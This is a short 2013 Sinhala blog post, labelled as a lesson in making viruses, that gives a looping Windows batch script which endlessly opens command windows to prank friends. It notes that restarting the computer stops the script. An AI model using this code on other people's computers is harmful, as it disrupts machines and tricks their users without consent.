Thursday, January 3, 2013
CMD files නොනවත්වා open වන virus එක
මේකනම් ඔයාලගේ යාලුවන්ව රවට්ටන්න පුළුවන් programe එකක් මේක click කලවිටදී cmd files විශාල ප්‍රමාණයක් open වේවි .
මේක කියල දුන්නට විතරක් මදිනේ නවත්වන විදිහ දැනගනත් ඕනෙනේ මෙන්න ක්‍රමය ඔයාලගේ copmuter එක restart කරන්න හරියාවි .
මෙම code note pad වලට copy කරලා save කරනකොට *.bat කියල save කරන්න .
Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2
:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1
Labels:
Virus සැදීම උගනිමු
Subscribe to:
Post Comments (Atom)





0 comments:
Post a Comment